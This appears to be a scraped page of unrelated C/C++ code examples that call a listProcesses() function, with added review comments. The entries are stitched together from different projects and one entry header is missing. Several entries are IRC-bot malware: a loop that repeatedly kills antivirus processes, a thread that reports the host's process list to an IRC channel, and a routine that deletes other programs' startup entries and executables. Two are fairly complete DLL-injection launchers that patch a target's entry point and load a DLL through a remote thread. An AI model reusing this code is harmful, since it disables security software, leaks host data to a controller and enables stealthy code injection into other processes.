Пример #1
/*
 * Thread routine from an IRC-bot sample: loops forever, calling
 * listProcesses() with its last flag TRUE and then sleeping killer_delay
 * milliseconds (killer_delay is a global defined elsewhere).  The function
 * name and the sibling examples on this page suggest that TRUE asks
 * listProcesses() to terminate matching processes — NOTE(review): the
 * helper's signature is not visible here, so that reading is inferred.
 *
 * This is hostile code (a security-product "killer" watchdog); it is
 * annotated for analysis, not for reuse.  param is unused.  The while(1)
 * has no exit, so the `return 0` below is unreachable: the thread only ends
 * when it is terminated from outside.
 */
DWORD WINAPI kill_av(LPVOID param)
{
	while (1) {
		listProcesses(0,NULL,NULL,FALSE,NULL,TRUE);
		Sleep(killer_delay);
	}
	return 0;	/* unreachable: the loop above never breaks */
}
Пример #2
/*
 * Same "kill AV" watchdog loop as kill_av() above, in the bot's
 * threadnum-slot style: param carries the thread's slot index cast to an
 * int (NOTE(review): casting LPVOID to int truncates on 64-bit builds).
 *
 * Hostile code, annotated for analysis only.  Because the while(1) never
 * exits, clearthread(threadnum) and ExitThread(0) are unreachable — the
 * slot is never released by this thread itself; it ends only when
 * terminated from outside.  listProcesses()' six-argument form is the one
 * used by the other bot examples on this page; its semantics are not shown.
 */
DWORD WINAPI KillAVThread(LPVOID param)
{
	int threadnum = (int)param;	/* pointer-to-int truncation on 64-bit */

	while (1) {
		listProcesses(0,NULL,NULL,FALSE,NULL,TRUE);
		Sleep(killer_delay);
	}
	clearthread(threadnum);	/* unreachable */

	ExitThread(0);		/* unreachable */
}
Пример #3
/*
 * Software-interrupt 0x21 service dispatcher of the toy kernel.
 *
 * ax selects the service; bx/cx/dx carry its operands (string or buffer
 * addresses, sector numbers, lengths — whatever the target routine takes).
 * Each service is forwarded to the matching kernel routine; nothing is
 * passed back through this function.  An unrecognised ax only prints a
 * diagnostic and is otherwise ignored.
 *
 * Service map:
 *   0x0 print string       0x1 read string        0x2 read sector
 *   0x3 read file          0x4 execute program    0x5 terminate
 *   0x6 write sector       0x7 delete file        0x8 write file
 *   0x9 kill process       0xa execute, blocking  0xb list processes
 *   0xc edit string
 */
void handleInterrupt21(int ax, int bx, int cx, int dx){
  /* The blocking execute is the only service that touches kernel state:
     currentProcess lives in the kernel data segment, so the segment is
     switched just long enough to read it, and the value is passed to
     executeProgram() (presumably as the process to wake when the child
     terminates — the loader is not shown here). */
  if(ax == 0xa){
    int caller;
    setKernelDataSegment();
    caller = currentProcess;
    restoreDataSegment();
    executeProgram(bx, caller);
    return;
  }

  switch(ax){
    case 0x0:  printString(bx);            break;
    case 0x1:  readString(bx);             break;
    case 0x2:  readSector(bx, cx);         break;
    case 0x3:  readFile(bx, cx);           break;
    case 0x4:  executeProgram(bx, NOONE);  break;  /* NOONE: no waiting process, by its name */
    case 0x5:  terminate();                break;
    case 0x6:  writeSector(bx, cx);        break;
    case 0x7:  deleteFile(bx);             break;
    case 0x8:  writeFile(bx, cx, dx);      break;
    case 0x9:  killProcess(bx);            break;
    case 0xb:  listProcesses();            break;
    case 0xc:  editString(bx);             break;
    default:
      printString("Interrupt21 got undefined ax.");
      break;
  }
}
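/*
 * Strip a decimal fraction from a numeric string in place ("123.45" -> "123").
 * A string without a '.' is left untouched: the previous inline form
 * chop(length() - indexOf(".")) turned indexOf()'s -1 into chop(length()+1),
 * which QString defines as "empty the string", wiping the value.
 */
static void truncateAtDot(QString &value){
    int dot = value.indexOf(".");
    if(dot >= 0){
        value.chop(value.length() - dot);
    }
}

/*
 * Assemble a '#'-separated list of "label,value" records describing the
 * host: network counters, CPU count, OS version, one record per logical
 * drive, RAM/CPU load, the process count and one record per process.
 *
 * The collector methods called first (cpuUsage() ... listProcesses())
 * refresh the member variables formatted here.  The byte counts and memory
 * figures are rewritten in place through getSizeUnit(), so a second call
 * re-converts already-converted values.  Fields are separated by ',' and
 * records by '#' with no escaping; a drive label or process name containing
 * either character would break the consumer's split.
 *
 * Returns the assembled QString.
 *
 * Changes from the previous version: decimal truncation no longer empties a
 * value that has no '.', and the two parallel-list loops stop at the
 * shortest list instead of assuming capacitys/useds are as long as
 * filesystems and procNames as long as procIDs (an out-of-range at() aborts).
 */
QString sysInfo::getDetailedStats(){
    cpuUsage();
    memPerc();
    netStat();
    cpuStats();
    getDiskDetails();
    osVersion();
    listProcesses();

    QString stats = "";
    bytesTransmitted = getSizeUnit(bytesTransmitted);
    bytesReceived = getSizeUnit(bytesReceived);
    //Add the netstat info to the stats string
    stats = stats + "Data Transmitted," + bytesTransmitted + "#Data Received," + bytesReceived + "#Packets Transmitted," + packetsTransmitted + "#Packets Received," + packetsReceived + "#Errors Transmitting," + transmitErrors + "#Errors Receiving," + receiveErrors;
    //Add the cpuStats to the stats string
    stats = stats + "#Number of Processors," + _cpuCount;
    //Add the OS Version
    stats = stats + "#Operating System," + osVers;

    //Add the various logical drive details: filesystems/capacitys/useds are
    //parallel lists, so iterate only as far as the shortest one reaches.
    int driveCount = filesystems.length();
    if(capacitys.length() < driveCount) driveCount = capacitys.length();
    if(useds.length() < driveCount) driveCount = useds.length();
    for(int i = 0; i < driveCount; i++){
        QString cap = capacitys.at(i);
        truncateAtDot(cap);
        cap = getSizeUnit(cap);
        QString used = useds.at(i);
        used = getSizeUnit(used);
        stats = stats + "#Drive Label," + filesystems.at(i) + ",Total Capacity," + cap+ ",Used Space," + used;
    }

    //Add RAM and CPU
    truncateAtDot(physMem);
    physMem = getSizeUnit(physMem);
    truncateAtDot(freePhysMem);
    freePhysMem = getSizeUnit(freePhysMem);
    //NOTE(review): the "Used RAM" field is filled from freePhysMem.  The member
    //name suggests free memory, but what memPerc() stores there is not visible
    //here, so the label is kept as it was — confirm against memPerc().
    stats = stats + "#Total RAM,"+physMem+"#Used RAM,"+freePhysMem+"#% RAM in use,"+memoryLoad+"#% CPU in use,"+cpuPerc;

    //Add the process/task related info (procIDs/procNames are parallel lists)
    stats = stats + "#Amount of Processes active," + procCount;
    int procsListed = procIDs.length();
    if(procNames.length() < procsListed) procsListed = procNames.length();
    for(int j = 0; j < procsListed; j++){
        stats = stats + "#" + procIDs.at(j) + "," + procNames.at(j);
    }
    return stats;
}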
Пример #5
/*
 * IRC-bot worker thread: reports the process list back to an IRC channel.
 * Hostile code, annotated for analysis only.
 *
 * param points to an LPROC describing the request (socket, channel, notice
 * flag, silent/full flags, thread slot).  The struct is copied by value
 * first and only then is lprocp->gotinfo set TRUE — the creator is
 * presumably waiting on that flag before it reuses or frees its copy
 * (NOTE(review): inferred from the statement order; the creator is not
 * shown).
 *
 * A listProcesses() return of 0 is reported as success, anything else as
 * failure.  Both status messages are fixed literals far shorter than
 * IRCLINE, so the sprintf() calls cannot overflow sendbuf.  Messages go to
 * the channel unless lproc.silent; the final one is always written to the
 * log.  The thread frees its slot with clearthread() and ends in
 * ExitThread(0); there is no return statement.  The "»" characters in the
 * literals appear to be single-byte (CP1252-style) glyphs.
 */
DWORD WINAPI listProcessesThread(LPVOID param)
{
	char sendbuf[IRCLINE];

	LPROC lproc = *((LPROC *)param);	/* private copy of the request */
	LPROC *lprocp = (LPROC *)param;
	lprocp->gotinfo = TRUE;			/* tell the creator its copy may go */

	sprintf(sendbuf,"proc »» Listing processes:");
	if (!lproc.silent) irc_privmsg(lproc.sock,lproc.chan,sendbuf,lproc.notice);

	if (listProcesses(lproc.sock,lproc.chan,lproc.notice,NULL, FALSE, lproc.full) == 0)
		sprintf(sendbuf,"proc »» Process list completed.");
	else
		sprintf(sendbuf,"proc »» Process list failed.");

	if (!lproc.silent) irc_privmsg(lproc.sock, lproc.chan, sendbuf, lproc.notice);
	addlog(sendbuf);

	clearthread(lproc.threadnum);

	ExitThread(0);
}
Пример #6
/*
 * Walks the global viruses[] table (registry hive/subkey/value plus an
 * executable name per entry, terminated by a NULL subkey).  For every entry
 * whose registry value exists it deletes that value, asks listProcesses()
 * to kill the named process, and deletes <system dir>\<file>.  Despite the
 * name nothing inspects file contents: the table is a fixed list of
 * start-up entries belonging to rival malware or security tools — hostile
 * bot code, annotated for analysis only.
 *
 * Defects visible in this body (left unchanged on purpose):
 *  - lRet (fRegOpenKeyEx result) is never checked, so when the open fails
 *    hkey is an uninitialised handle that is still passed to
 *    fRegQueryValueEx and fRegCloseKey.
 *  - dwSize is an in/out parameter of RegQueryValueEx: it is set to 128 once
 *    and never reset, so after the first successful query every later query
 *    is limited to the previous value's size.
 *  - strcpy(current, viruses[i].file) copies into a 20-byte buffer with no
 *    length check.
 *  - sendbuf is formatted three times but never sent or logged, and the
 *    socket from fsocket() is never used or closed.
 *  - listProcesses() is called here with 4 arguments, unlike the 6-argument
 *    calls in the sibling examples — a different build of the helper.
 *  - DeleteFile() on an executable that is still running fails silently.
 */
void removevirus()
{
	char sysdir[MAX_PATH], virusexecuteble[MAX_PATH];
	unsigned char szDataBuf[128]; 
	SOCKET sock;
	HKEY hkey;
	char sendbuf[IRCLINE];
	char current[20];
	LONG lRet;
	sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP);	/* never used or closed */
	DWORD dwSize = 128;	/* in/out for RegQueryValueEx; not reset per iteration */

	for (unsigned int i=0; viruses[i].subkey; i++) {
		lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ, &hkey);	/* lRet unchecked */
		if(fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {
			
				fRegDeleteValue(hkey, viruses[i].value);
				strcpy(current,viruses[i].file);	/* unbounded copy into current[20] */
				//FIXME: Replace the afw kill utils. we dont need to let that loop,
				//		 when we removed the .exe and the reg key. mayb a static call
				//		 to KillProcess(); can be inserted here. Something like:
				if(listProcesses(sock,NULL,FALSE,current) == 1)
					sprintf(sendbuf,"[PROC]: Process killed: %s",viruses[i].file);
				else
					sprintf(sendbuf,"[PROC]: Failed to terminate process: %s", viruses[i].file);
				//KillProcess(viruses[i].file);
				GetSystemDirectory(sysdir, sizeof(sysdir));
				sprintf(virusexecuteble, "%s\\%s", sysdir, viruses[i].file);
				DeleteFile(virusexecuteble);
			
		}
		fRegCloseKey(hkey);	/* closes an indeterminate handle when the open failed */
		
	}
	sprintf(sendbuf,"[AV]: Antivirus search complete! ");	/* formatted but never sent */
	return;
}
Пример #7
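/*
 * sinjector entry point: injects the DLL named by the .ini file that sits
 * next to this executable into a target process, or spawns a new process
 * and hooks it.
 *
 * Switches (usage() is shown when none is given or on /? and /h):
 *   /l             list processes and exit
 *   /x <cmdline>   spawn <cmdline> and inject   (/X also waits for a key press)
 *   /p <pid>       inject into a running pid    (/P marks the target suspended)
 *   /i <pid>       dump the target's IAT instead of hooking
 *   /u <pid>       unhook a previously hooked target
 *
 * Returns 0 on success or after an informational path, 1 on a bad or
 * missing argument, an unparseable ini, or a pid that cannot be opened.
 *
 * Changes from the previous version of this function: path strings are
 * built with snprintf() and length-checked (they were strcpy/strcat into
 * 512-byte arrays); argv[2] is only read when argc says it exists (a bare
 * "/p" called atoi(NULL)); the ini pointer is checked before its first
 * dereference rather than after; the pid is parsed with strtoul() and
 * rejected when it is not a number; the probe handle from OpenProcess() is
 * closed; format specifiers match DWORD; and the dead commented-out
 * "classic injection" block that followed the final return was removed
 * (injecta()/spwanAndHook() are the live paths).
 */
int main(int argc, char* argv[]) {
	char dllToInject[512], iniFilePath[512], basePath[512];
	char cmd[512];
	DWORD pid = 0;
	opt options;
	FILE *in;
	iniFile *ini;

	SetDebugPrivileges();

	/* Directory of this executable: absolute argv[0], cut just after the last '\'. */
	if (_fullpath(basePath, argv[0], sizeof(basePath)) == NULL) {
		printf("Error: cannot resolve the injector's own path\n");
		return 1;
	}
	for (char *p = basePath + strlen(basePath); p > basePath; p--) {
		if (*p == '\\') {
			*(p + 1) = 0;
			break;
		}
	}

	/* build ini path */
	if (snprintf(iniFilePath, sizeof(iniFilePath), "%s%s", basePath, INIFILE) >= (int)sizeof(iniFilePath)) {
		printf("Error: ini path too long\n");
		return 1;
	}

	options.dumpIAT = FALSE;
	options.loadINI = TRUE;
	options.hook    = TRUE;
	options.unhook  = FALSE;
	options.cmdline = NULL;
	options.waitKeyPress = FALSE;
	options.iniPath = iniFilePath;
	options.suspended = FALSE;

	/* Everything below needs the ini (the DLL name comes from it), so a
	   missing/unparseable ini is fatal here rather than a NULL deref later. */
	ini = parseIni(iniFilePath);
	if (ini == NULL) {
		printf("Error: cannot parse ini: %s\n", iniFilePath);
		return 1;
	}
	options.ini = ini;

	/* build dll path */
	if (snprintf(dllToInject, sizeof(dllToInject), "%s%s", basePath, ini->dll) >= (int)sizeof(dllToInject)) {
		printf("Error: DLL path too long\n");
		return 1;
	}

	if (argc < 2) usage(dllToInject, iniFilePath);

	/* Existence probe only; the injection paths open the DLL themselves. */
	in = fopen(dllToInject, "r");
	if (in == NULL) {
		snprintf(cmd, sizeof(cmd), "Error: DLL to inject NOT FOUND: %s", dllToInject);
		logger(ini, "injector", cmd, strlen(cmd));
		printf("DLL to inject not found... Path:\n");
		printf("%s\n", dllToInject);
		return 0;
	}
	fclose(in);

	if (argc > 1 && argv[1][0] == '/') {
		char sw = argv[1][1];

		if (sw == '?' || sw == 'h') usage(dllToInject, iniFilePath);
		if (sw == 'l') {
			listProcesses();
			exit(0);
		}
		/* read command line */
		if (sw == 'x' || sw == 'X') {
			if (argc < 3) {
				printf("Error: /%c needs a command line\n", sw);
				return 1;
			}
			options.cmdline = argv[2];
			options.waitKeyPress = (sw == 'X') ? TRUE : FALSE;
		}
		/* read the pid */
		if (sw == 'p' || sw == 'P' || sw == 'i' || sw == 'u') {
			char *end = NULL;

			if (argc < 3) {
				printf("Error: /%c needs a pid\n", sw);
				return 1;
			}
			pid = (DWORD)strtoul(argv[2], &end, 10);
			if (end == argv[2] || *end != '\0') {
				printf("Error: pid is not a number: %s\n", argv[2]);
				return 1;
			}
			if (sw == 'i') {
				options.dumpIAT = TRUE;
				options.hook = FALSE;
				snprintf(cmd, sizeof(cmd), "Dump IAT requested for Pid %lu", (unsigned long)pid);
				logger(ini, "injector", cmd, strlen(cmd));
			}
			if (sw == 'u') {
				options.dumpIAT = FALSE;
				options.hook = FALSE;
				options.loadINI = FALSE;
				options.unhook = TRUE;
				snprintf(cmd, sizeof(cmd), "Unhook requested for PID %lu", (unsigned long)pid);
				logger(ini, "injector", cmd, strlen(cmd));
			}
			if (sw == 'P') options.suspended = TRUE;
		}
	}

	printf(TITLE"\n");

	/* Neither a pid nor a command line: nothing to do. */
	if (pid == 0 && options.cmdline == NULL) return 1;

	if (pid != 0) {
		/* Probe that the pid exists and is openable.  The handle is not needed
		   afterwards (injecta() is passed the pid, not the handle), so it is
		   closed instead of leaked. */
		HANDLE process = OpenProcess(MAXIMUM_ALLOWED, FALSE, pid);
		if (process == NULL) {
			printf("[Error] the specified process couldn't be found. Code: %lu\n", (unsigned long)GetLastError());
			snprintf(cmd, sizeof(cmd), "Error: Invalid Pid %lu", (unsigned long)pid);
			logger(ini, "injector", cmd, strlen(cmd));
			return 1;
		}
		CloseHandle(process);
	}

	if (ini->debuglevel > 3) {
		snprintf(cmd, sizeof(cmd), "sinjector.exe called...");
		logger(ini, "injector", cmd, strlen(cmd));
		snprintf(cmd, sizeof(cmd), "Ini: %s", iniFilePath);
		logger(ini, "injector", cmd, strlen(cmd));
		snprintf(cmd, sizeof(cmd), "DLL: %s", dllToInject);
		logger(ini, "injector", cmd, strlen(cmd));
	}

	/* dump ini options; a debuglevel of 0 also disables loading the ini in the target */
	if (ini->debuglevel > 0) {
		printf("[ini] dll=%s\n", *ini->dll ? ini->dll : "Error!!!");
		if (ini->monitor) printf("[ini] monitor=%s\n", *ini->monitor ? ini->monitor : "none (DISABLED)");
		if (ini->logfile) printf("[ini] logfile=%s\n", *ini->logfile ? ini->logfile : "none (DISABLED)");
		if (ini->iatfile) printf("[ini] iatfile=%s\n", *ini->iatfile ? ini->iatfile : "none (DISABLED)");
		if (ini->backup)  printf("[ini] backup=%s\n", *ini->backup ? ini->backup : "none (DISABLED)");
		printf("[ini] debuglevel=%d\n", ini->debuglevel);
		printf("[ini] reinject=%d (%s)\n", ini->reinject, ini->reinject ? "ENABLED" : "DISABLED");
		if (ini->reinject_blacklist) printf("[ini] reinject_blacklist=%s\n", *ini->reinject_blacklist ? ini->reinject_blacklist : "none (DISABLED)");
	} else {
		options.loadINI = FALSE;
	}

	if (options.cmdline != NULL) {
		spwanAndHook(dllToInject, &options);
	} else {
		injecta(pid, dllToInject, &options);
	}
	return 0;
}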
Пример #8
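/*
 * Print " [FAIL] <system text for GetLastError()>".  The buffer that
 * FormatMessage() allocates is deliberately not released: every caller
 * leaves main() right afterwards and process exit reclaims it.
 */
static void print_last_error(void)
{
	char *errorMessage = NULL;
	FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
	              0, GetLastError(), 0, (char *)&errorMessage, 1, NULL);
	printf(" [FAIL] %s", errorMessage != NULL ? errorMessage : "(no error text)\n");
}

/*
 * Copy a NUL-terminated string into one of the MAX_PATH-byte input buffers
 * without overflowing it.  Returns 0 if src fit, -1 if src was NULL or had
 * to be truncated (dst is then empty or truncated, and the caller aborts).
 */
static int copy_path(char *dst, const char *src)
{
	if (src == NULL) {
		dst[0] = '\0';
		return -1;
	}
	return snprintf(dst, MAX_PATH, "%s", src) < MAX_PATH ? 0 : -1;
}

/*
 * shackle launcher entry point.
 *
 * Modes (chosen by parseArgs() through the opMode/global* variables):
 *   OPMODE_LIST    list processes matching stringToMatch and exit.
 *   OPMODE_INJECT  inject dllInput into the already-running pid globalInject.
 *   otherwise      start exeInput suspended (working directory wdrInput),
 *                  park its main thread on a two-byte `jmp $` (EB FE)
 *                  written over the entry point, load dllInput into it with
 *                  a LoadLibraryA remote thread, wait globalCooldown seconds,
 *                  then restore the original entry bytes and let it run.
 *
 * Missing exe/dll/working-directory values are read from stdin, or taken
 * from fixed test values when globalTest is set.
 *
 * Returns 0 in every case (the file's convention; failures are reported on
 * stdout).  If something fails after the child was created it is terminated
 * instead of being left suspended or spinning on the patched entry point.
 *
 * Changes from the previous version: allocations are checked and always
 * freed; copies into the MAX_PATH buffers are bounded; the interactive DLL
 * name on the INJECT path is chomp()ed like the other inputs (its trailing
 * '\n' used to reach injectIntoProcess()); LoadLibrary/GetProcAddress,
 * CreateProcess (as a BOOL), VirtualProtectEx, Read/WriteProcessMemory,
 * VirtualAllocEx and GetThreadContext results are checked; CONTEXT is
 * zeroed before use; the protection change covers both patched bytes (it
 * covered one, which breaks when the entry point is the last byte of a
 * page); the readback of the remote DLL name reads only what was allocated
 * (it read MAX_PATH from a strlen+1 block); CreateRemoteThread's flags
 * argument is 0 rather than a NULL pointer; handles are closed; the WOW64
 * check inspects the resolved dllInput rather than globalDll, which is NULL
 * on the interactive path.
 */
int main(int argc,char **argv)
{
	SIZE_T bW = 0, bR = 0;
	char *exeInput = NULL, *dllInput = NULL, *wdrInput = NULL, *dllOutput = NULL;
	PROCESS_INFORMATION pi;
	STARTUPINFO si;
	PROCESS_BASIC_INFORMATION pib;
	PEB_ARCHI globalPEB;
	CONTEXT context;
	HANDLE hNtDll = NULL, hKernel = NULL, hProcess = NULL, hThread = NULL, remoteThread = NULL;
	LPVOID addrLoadLibrary = NULL, remoteMemory = NULL;
	UINT_PTR entryPoint = 0;
	char oldEntryChars[2] = {0, 0}, newEntryChars[2] = {0, 0};
	DWORD oldProtect = 0, discardProtect = 0;
	size_t dllLen = 0;
	int i;
	#if ARCHI == 64
	BOOL wow64 = FALSE;
	#endif

	parseArgs(argc, argv);

	exeInput = (char *)calloc(1, MAX_PATH);
	dllInput = (char *)calloc(1, MAX_PATH);
	wdrInput = (char *)calloc(1, MAX_PATH);
	if (exeInput == NULL || dllInput == NULL || wdrInput == NULL) {
		printf(" [FAIL] out of memory\n");
		goto done;
	}

	if (opMode == OPMODE_LIST) {
		listProcesses(stringToMatch);
		goto done;
	}
	if (opMode == OPMODE_INJECT) {
		if (globalDll == NULL) {
			printf(" [dll] > ");
			if (fgets(dllInput, MAX_PATH, stdin) != NULL) chomp(dllInput);
		} else if (copy_path(dllInput, globalDll) != 0) {
			printf(" [FAIL-DLL] path too long\n");
			goto done;
		}
		injectIntoProcess(globalInject, dllInput);
		goto done;
	}

	if (globalTest) {
		copy_path(exeInput, "test.exe");
		copy_path(dllInput, "shackle.dll");
		copy_path(wdrInput, "c:\\projects\\elegurawolfe\\");
	} else if (globalExeName == NULL || globalWorkingDirectory == NULL || globalDll == NULL) {
		/* Interactive: exe and working directory are always asked for here,
		   the DLL only when it was not given on the command line. */
		printf(" [exe] > ");
		if (fgets(exeInput, MAX_PATH, stdin) == NULL) goto done;
		if (globalDll == NULL) {
			printf(" [dll] > ");
			if (fgets(dllInput, MAX_PATH, stdin) == NULL) goto done;
		} else if (copy_path(dllInput, globalDll) != 0) {
			printf(" [FAIL-DLL] path too long\n");
			goto done;
		}
		printf(" [wdr] > ");
		if (fgets(wdrInput, MAX_PATH, stdin) == NULL) goto done;

		chomp(exeInput);
		chomp(dllInput);
		chomp(wdrInput);
	} else if (copy_path(exeInput, globalExeName) != 0 ||
	           copy_path(dllInput, globalDll) != 0 ||
	           copy_path(wdrInput, globalWorkingDirectory) != 0) {
		printf(" [FAIL] argument path too long\n");
		goto done;
	}

	if (exists(exeInput) == 0) {
		printf(" [FAIL-EXE] %s does not exist\n", exeInput);
		goto done;
	}
	if (exists(dllInput) == 0) {
		printf(" [FAIL-DLL] %s does not exist\n", dllInput);
		goto done;
	}

	memset(&pi, 0, sizeof(pi));
	memset(&si, 0, sizeof(si));
	si.cb = sizeof(si);

	hNtDll = LoadLibrary("ntdll.dll");
	hKernel = LoadLibrary("kernel32.dll");
	if (hNtDll == NULL || hKernel == NULL) {
		print_last_error();
		goto done;
	}
	NtQueryInformationProcess = (_NtQueryInformationProcess)GetProcAddress((HMODULE)hNtDll, "NtQueryInformationProcess");
	addrLoadLibrary = GetProcAddress((HMODULE)hKernel, "LoadLibraryA");
	if (NtQueryInformationProcess == NULL || addrLoadLibrary == NULL) {
		printf(" [FAIL] NtQueryInformationProcess or LoadLibraryA not found\n");
		goto done;
	}

	/* The child starts suspended so its entry point can be patched before any
	   of its code runs.  Passing our own LoadLibraryA address to the child
	   assumes kernel32 is mapped at the same base there (same-bitness
	   processes; the ARCHI==64 branch below warns about WOW64 targets). */
	if (!CreateProcess(exeInput, exeInput, NULL, NULL, FALSE,
	                   CREATE_SUSPENDED | CREATE_NEW_CONSOLE, NULL, wdrInput, &si, &pi)) {
		print_last_error();
		goto done;
	}
	hProcess = pi.hProcess;
	hThread = pi.hThread;
	globalPid = pi.dwProcessId;
	printf(" * [INFO] new process id is %lu\n", (unsigned long)pi.dwProcessId);

	#if ARCHI == 64
		IsWow64Process(hProcess, &wow64);
		if (wow64 == TRUE) {
			IsDll64Bit(dllInput);
			printf(" [WARN] injecting into wow64 ");
		}
	#endif

	printf(" [INFO] process handle is %p\n", (void *)hProcess);

	memset(&pib, 0, sizeof(pib));
	NtQueryInformationProcess(hProcess, 0, (PVOID)(&pib), sizeof(pib), &bW);
	if (pib.PebBaseAddress == NULL) {
		printf(" [FAIL] NtQueryInformationProcess returned no PEB address\n");
		goto kill_child;
	}
	printf(" [INFO] pib.PebBaseAddress = 0x%p (size of field is %u)\n",
	       pib.PebBaseAddress, (unsigned)sizeof(pib.PebBaseAddress));

	if (!ReadProcessMemory(hProcess, pib.PebBaseAddress, &globalPEB, sizeof(globalPEB), &bR) ||
	    bR != sizeof(globalPEB)) {
		print_last_error();
		goto kill_child;
	}
	printf(" [INFO] peb.ImageBaseAddress = %p\n", (void *)(globalPEB.ImageBaseAddress));

	entryPoint = guessExecutableEntryPoint(hProcess, globalPEB.ImageBaseAddress);
	printf(" [INFO] entryPoint = 0x%p\n", (void *)entryPoint);

	/* Park the main thread: overwrite the first two entry bytes with EB FE
	   (a jump to itself) so the process idles there while the DLL loads
	   instead of running its real code.  Both bytes are covered by the
	   protection change. */
	if (!VirtualProtectEx(hProcess, (LPVOID)entryPoint, 2, PAGE_READWRITE, &oldProtect)) {
		print_last_error();
		goto kill_child;
	}
	if (!ReadProcessMemory(hProcess, (LPCVOID)entryPoint, oldEntryChars, 2, &bR) || bR != 2) {
		print_last_error();
		goto kill_child;
	}
	printf(" [INFO] old entry is %02x %02x\n", (unsigned char)oldEntryChars[0], (unsigned char)oldEntryChars[1]);
	printf(" [INFO] writing...\n");

	if (!WriteProcessMemory(hProcess, (LPVOID)entryPoint, "\xEB\xFE", 2, &bW)) {
		print_last_error();
		goto kill_child;
	}
	VirtualProtectEx(hProcess, (LPVOID)entryPoint, 2, oldProtect, &discardProtect);

	ReadProcessMemory(hProcess, (LPCVOID)entryPoint, newEntryChars, 2, &bR);
	if (newEntryChars[0] != '\xEB' || newEntryChars[1] != '\xFE') {
		printf(" [INFO] new entry is %02x %02x, something's wrong\n", (unsigned char)newEntryChars[0], (unsigned char)newEntryChars[1]);
		goto kill_child;
	}
	printf(" [INFO] new entry is %02x %02x\n", (unsigned char)newEntryChars[0], (unsigned char)newEntryChars[1]);

	/* NOTE(review): the thread's PC is pointed straight at the (now spinning)
	   entry point rather than letting the loader stub reach it on its own;
	   kept as in the original, as the tool depends on that sequence. */
	memset(&context, 0, sizeof(context));
	context.ContextFlags = CONTEXT_FULL;
	if (!GetThreadContext(hThread, &context)) {
		print_last_error();
		goto kill_child;
	}
	context.PC_REG = entryPoint;
	SetThreadContext(hThread, &context);
	ResumeThread(pi.hThread);

	/* Place the DLL path in the child for LoadLibraryA to read. */
	dllLen = strlen(dllInput) + 1;
	remoteMemory = VirtualAllocEx(hProcess, NULL, dllLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	if (remoteMemory == NULL ||
	    !WriteProcessMemory(hProcess, (LPVOID)remoteMemory, dllInput, dllLen, &bW)) {
		print_last_error();
		goto kill_child;
	}

	printf(" [INFO] trying to create a remote thread at %p\n", (void *)addrLoadLibrary);

	/* Read the path back as a sanity check on the remote write. */
	dllOutput = (char *)calloc(1, MAX_PATH);
	if (dllOutput != NULL) {
		ReadProcessMemory(hProcess, (LPCVOID)remoteMemory, dllOutput, dllLen, &bR);
		dllOutput[MAX_PATH - 1] = '\0';
		printf(" [INFO] confirming process has cave with \"%s\"\n", dllOutput);
		free(dllOutput);
		dllOutput = NULL;
	}

	if (globalWait) {
		printf(" [WAIT] press any key to create remote thread...\n");
		getc(stdin);
	}

	remoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)addrLoadLibrary, remoteMemory, 0, NULL);
	if (remoteThread == NULL) {
		printf(" [INFO] could not create remote thread\n");
		goto kill_child;
	}
	WaitForSingleObject(remoteThread, INFINITE);	/* LoadLibraryA has returned in the child */
	CloseHandle(remoteThread);
	remoteThread = NULL;

	for (i = globalCooldown; i > 0; i--) {
		printf(" [INFO] waiting %d seconds\n", i);
		Sleep(1000);
	}

	/* Put the original entry bytes back and restart the main thread at the
	   entry point so the program runs normally from here. */
	printf(" [INFO] restoring entrypoint...\n");
	SuspendThread(pi.hThread);

	if (!VirtualProtectEx(hProcess, (LPVOID)entryPoint, 2, PAGE_READWRITE, &oldProtect) ||
	    !WriteProcessMemory(hProcess, (LPVOID)entryPoint, oldEntryChars, 2, &bW)) {
		print_last_error();
		goto kill_child;
	}
	ReadProcessMemory(hProcess, (LPCVOID)entryPoint, newEntryChars, 2, &bR);
	VirtualProtectEx(hProcess, (LPVOID)entryPoint, 2, oldProtect, &discardProtect);
	printf(" [INFO] entry restored to %02x %02x\n", (unsigned char)newEntryChars[0], (unsigned char)newEntryChars[1]);

	memset(&context, 0, sizeof(context));
	context.ContextFlags = CONTEXT_FULL;
	GetThreadContext(hThread, &context);
	context.PC_REG = entryPoint;
	SetThreadContext(hThread, &context);
	ResumeThread(pi.hThread);

	printf(" [INFO] bye!");
	goto done;

kill_child:
	/* A step failed while the child was suspended or spinning on the patched
	   entry point; do not leave it orphaned in that state. */
	printf(" [FAIL] terminating pid %lu\n", (unsigned long)pi.dwProcessId);
	TerminateProcess(hProcess, 1);

done:
	if (remoteThread != NULL) CloseHandle(remoteThread);
	if (hThread != NULL) CloseHandle(hThread);
	if (hProcess != NULL) CloseHandle(hProcess);
	free(dllOutput);
	free(exeInput);
	free(dllInput);
	free(wdrInput);
	return 0;
}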